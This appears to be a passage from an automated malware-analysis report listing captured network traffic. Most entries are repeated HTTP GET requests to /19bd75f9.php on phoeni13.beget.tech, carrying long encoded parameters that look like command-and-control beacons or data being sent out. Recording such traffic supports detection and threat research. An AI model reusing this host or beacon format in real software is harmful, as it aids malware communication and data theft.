text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXUq9EeNp2TzUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8&152f328392d8768f56766d0288112f44=f6a1095ee603dfb2a6045076d6e72102&365174fb29f58fe307a28d17c1f20f9c=QYkJ2NxQjZjdjM3EzM2gzNiNDOxQzYlFTNzkDOmF2MhlTZ3ETMmZjY&b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZTZ0czY0EWYyUDNxM2YiVGZwIWMxkDN0QGO5IGOkdjYjBjNmFGZmJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nIwglZpFkaJZTSplFMZpXWzUUbZxmVHp1dRdlWtZ0VNpGaE5kMZ1mT0UUbZhmSq10aspWT5l0VONTRH9EeV1WWpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIjFTZ1QzYkFDO5QmMyMDOzYWOiN2NhJWY1cjZxYzMjFTMxI2N5MmMkJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&e2d3fb800645a2797de70f7dc33b39b6=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 HTTP/1.1Accept: 